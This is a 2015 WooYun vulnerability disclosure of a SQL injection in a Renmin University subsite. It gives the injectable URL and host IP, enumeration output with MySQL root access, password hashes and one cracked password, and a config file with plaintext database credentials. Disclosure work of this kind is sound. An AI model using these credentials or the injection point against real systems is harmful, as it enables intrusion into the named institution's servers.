当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117204

漏洞标题:中国人民大学某分站sql注入

相关厂商:中国人民大学

漏洞作者: 爱南瓜

提交时间:2015-06-01 12:10

修复时间:2015-07-17 08:38

公开时间:2015-07-17 08:38

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:7

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-01: 细节已通知厂商并且等待厂商处理中
2015-06-02: 厂商已经确认,细节仅向厂商公开
2015-06-12: 细节向核心白帽子及相关领域专家公开
2015-06-22: 细节向普通白帽子公开
2015-07-02: 细节向实习白帽子公开
2015-07-17: 细节向公众公开

简要描述:

哎~

详细说明:

存在漏洞网址:http://confucian.ruc.edu.cn/jgsz.php?cid=28

Target: 		http://confucian.ruc.edu.cn/jgsz.php?cid=28 #root权限注入点gpc=on
Host IP: 202.112.126.115
Web Server: Apache/2.2.16 (Win32) PHP/5.2.14
Powered-by: PHP/5.2.14
DB Server: MySQL
Resp. Time(avg): 3626 ms
Current User: root@localhost
Sql Version: 5.1.50-community-log
Current DB: kzzx
System User: root@localhost
Host Name: svctag-ctqtq2x
Installation dir: D:\PHPnow\MySQL-5.1.50
DB User & Pass: root:*07EB305042ACE2638B44481D077FABD4D184ACE8:localhost
admin:*2CCA69BB9AED6830B35255849B2CA0AC0CE8CF52:localhost
ceap:*3C06A471CB6048FCCCF5DB904D8F5BE49F1C7585:localhost //ceap:daniel
Data Bases: information_schema
agora
ceap
ceap_master
course
kzzx
mysql
rwbjorg


猜测出了网站路径:D:\PHPnow\htdocs\kzzx\
找到配置文件,但是这是什么鬼:
config.php
<?php
// 鏁版嵁搴撳悕
define('DB_NAME', 'fjlysycn');
// 鏁版嵁搴撶敤鎴?
define('DB_USER', 'fjlysycn');
//鏁版嵁搴撳瘑鐮?
define('DB_PASSWORD', 'lai3221');
// 鏈嶅姟鍣ㄥ悕鎴栨湇鍔″櫒ip,涓€鑸负localhost
define('DB_HOST', '6055.vh.cnolnic.com');
/*MYSQL缂栫爜璁剧疆.濡傛灉鎮ㄧ殑绋嬪簭鍑虹幇涔辩爜鐜拌薄锛岄渶瑕佽缃椤规潵淇.
璇蜂笉瑕侀殢鎰忔洿鏀规椤癸紝鍚﹀垯灏嗗彲鑳藉鑷寸郴缁熷嚭鐜颁贡鐮佺幇璞?/
define('DB_CHARSET', 'utf8');
// 琛ㄥ悕鍓嶇紑, 鍚屼竴鏁版嵁搴撳畨瑁呭涓淇敼姝ゅ
define('DB_PREFIX', 'kz_');
//----------------------------------------
define('DB_COLLATE', '');
?>

漏洞证明:

11.JPG


下面这个是连接那个数据库的,可能是很久以前用的

111.png

修复方案:

版权声明:转载请注明来源 爱南瓜@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-06-02 08:36

厂商回复:

非常感谢!已通知。

最新状态:

暂无


漏洞评价:

评论